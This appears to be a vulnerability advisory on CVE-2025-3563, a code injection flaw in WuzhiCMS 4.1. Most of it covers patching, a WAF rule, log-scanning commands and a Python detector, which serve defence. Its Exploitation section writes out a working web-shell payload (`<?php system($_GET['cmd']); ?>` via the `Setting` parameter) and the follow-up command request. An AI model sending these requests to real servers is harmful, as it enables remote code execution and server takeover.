How CVE-2025-3563 Works
The vulnerability in WuzhiCMS 4.1 resides in the `/index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1` endpoint, in the Setting Handler component. The `Set` function does not properly validate its input, so malicious code can be injected via the `Setting` parameter. Because the input is insufficiently sanitized, processing a crafted payload results in arbitrary PHP code execution. Remote attackers can exploit the flaw without authentication, enabling server compromise. A public exploit is available, which increases the exploitation risk: attackers inject commands via HTTP requests, leading to full system control under the web server's privileges.
DailyCVE Form
Platform: WuzhiCMS
Version: 4.1
Vulnerability: Code Injection
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation
1. Craft a POST request to `/index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1` with a malicious `Setting` payload:
```http
POST /index.php?m=attachment&f=index&_su=wuzhicms&v=set&submit=1 HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Setting=<?php system($_GET['cmd']); ?>
```
2. Execute OS commands via:
```http
GET /index.php?cmd=id HTTP/1.1
Host: target.com
```
Protection
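1. Patch by sanitizing `Setting` input:
```php
// FILTER_SANITIZE_STRING is deprecated as of PHP 8.1; encode special characters instead.
$setting = filter_input(INPUT_POST, 'Setting', FILTER_SANITIZE_FULL_SPECIAL_CHARS);
```
2. WAF rule to block suspicious patterns (nginx's `deny` directive only accepts client addresses, so the pattern match is written here as a ModSecurity rule; the rule id is a placeholder):
```
SecRule ARGS_POST:Setting "@contains <?php" "id:1000001,phase:2,t:lowercase,deny,status:403,log,msg:'PHP tag in Setting parameter'"
```
3. Disable the vulnerable endpoint if unused (`RewriteRule` patterns do not see the query string, so it is matched with `RewriteCond`):
```apache
RewriteCond %{QUERY_STRING} m=attachment&f=index&_su=wuzhicms&v=set
RewriteRule ^/?index\.php$ - [F]
```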
Detection
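1. Scan for exploit attempts (POST bodies are not written to the access log by default, so also match requests to the endpoint itself):
```bash
grep -Ei 'Setting=(<|%3C)(\?|%3F)php|m=attachment&f=index&_su=wuzhicms&v=set' /var/log/apache2/access.log
```
2. Monitor file modifications:
```bash
find /var/www/html -type f -mtime -1 -ls
```
3. Check for active backdoors:
```bash
lsof -i | grep 'php'
```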
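A literal string match on the access log misses requests whose query parameters arrive in a different order or URL-encoded. The following added example (not part of the original advisory or of WuzhiCMS) parses Apache combined-format lines, decodes the query string, and flags requests to the endpoint named above as well as PHP tags and `cmd` parameters in URLs. The function names, reason labels and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: host ident user [time] "METHOD URL PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" \d{3}')

# Route parameters of the vulnerable endpoint, taken from the advisory URL.
ENDPOINT = {"m": "attachment", "f": "index", "v": "set"}


def classify(line):
    """Return (ip, reason) for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["url"])
    # parse_qs URL-decodes values, so %3C%3Fphp and <?php look the same here.
    query = parse_qs(parts.query, keep_blank_values=True)
    first = {k: v[0] for k, v in query.items()}
    if any("<?php" in v.lower() for vals in query.values() for v in vals):
        return (m["ip"], "php-tag-in-query")
    if all(first.get(k) == v for k, v in ENDPOINT.items()):
        # The POST body is not logged, so every write to this endpoint needs review.
        reason = "endpoint-post" if m["method"] == "POST" else "endpoint-probe"
        return (m["ip"], reason)
    if parts.path.endswith(".php") and "cmd" in first:
        return (m["ip"], "cmd-parameter")
    return None


def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [29/Apr/2025:10:00:01 +0000] "POST /index.php?v=set&m=attachment&f=index&_su=wuzhicms&submit=1 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [29/Apr/2025:10:00:05 +0000] "GET /index.php?cmd=id HTTP/1.1" 200 64 "-" "curl/8.0"',
    '203.0.113.9 - - [29/Apr/2025:10:01:00 +0000] "GET /index.php?m=content&f=index&v=show HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [29/Apr/2025:10:02:00 +0000] "GET /index.php?Setting=%3C%3Fphp%20echo HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, reason in scan(SAMPLE):
        print(ip, reason)
```

An `endpoint-post` hit followed by a `cmd-parameter` hit from the same address is the sequence to triage first, since it matches the two request steps listed under Exploitation.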
Mitigation
1. Immediate actions:
```bash
chmod -R 750 /var/www/html
```
2. Update WuzhiCMS or apply vendor patches.
3. Restrict PHP execution in upload directories:
```apache
php_admin_flag engine off
```
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode